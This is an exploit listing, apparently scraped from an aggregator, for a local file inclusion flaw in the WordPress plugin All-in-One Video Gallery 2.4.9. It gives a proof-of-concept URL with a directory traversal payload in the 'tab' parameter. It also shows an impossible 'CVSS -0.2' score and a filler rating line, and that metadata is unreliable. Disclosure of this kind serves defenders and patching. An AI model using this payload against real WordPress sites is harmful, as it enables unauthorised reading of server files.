Exploit for WordPress All-In-One Video Gallery 2.4.9 Local File Inclusion

Name: Exploit for WordPress All-In-One Video Gallery 2.4.9 Local File Inclusion
Rating: 5 (285 reviews)

2021-12-03 | CVSS -0.2

## https://sploitus.com/exploit?id=PACKETSTORM:165152
# Exploit Title: WordPress Plugin All-in-One Video Gallery plugin 2.4.9 - Local File Inclusion (LFI)   
# Exploit Author: Mohamed Magdy Abumusilm Aka m19o   
# Software: All-in-One Video Gallery plugin   
# Version: <= 2.4.9  
# Tested on: Windows,linux   
  
Poc: https://example.com/wordpress/wp-admin/admin.php?page=all-in-one-video-gallery&tab=../../../../../poc  
  
Decription : Authenticated user can exploit LFI vulnerability in tab parameter.  
  
Vulnerable code block : https://i.ibb.co/hXRcSQp/1123.png  
  
You can find a writeup at my blog : https://m19o.github.io/posts/How-i-found-my-first-0day/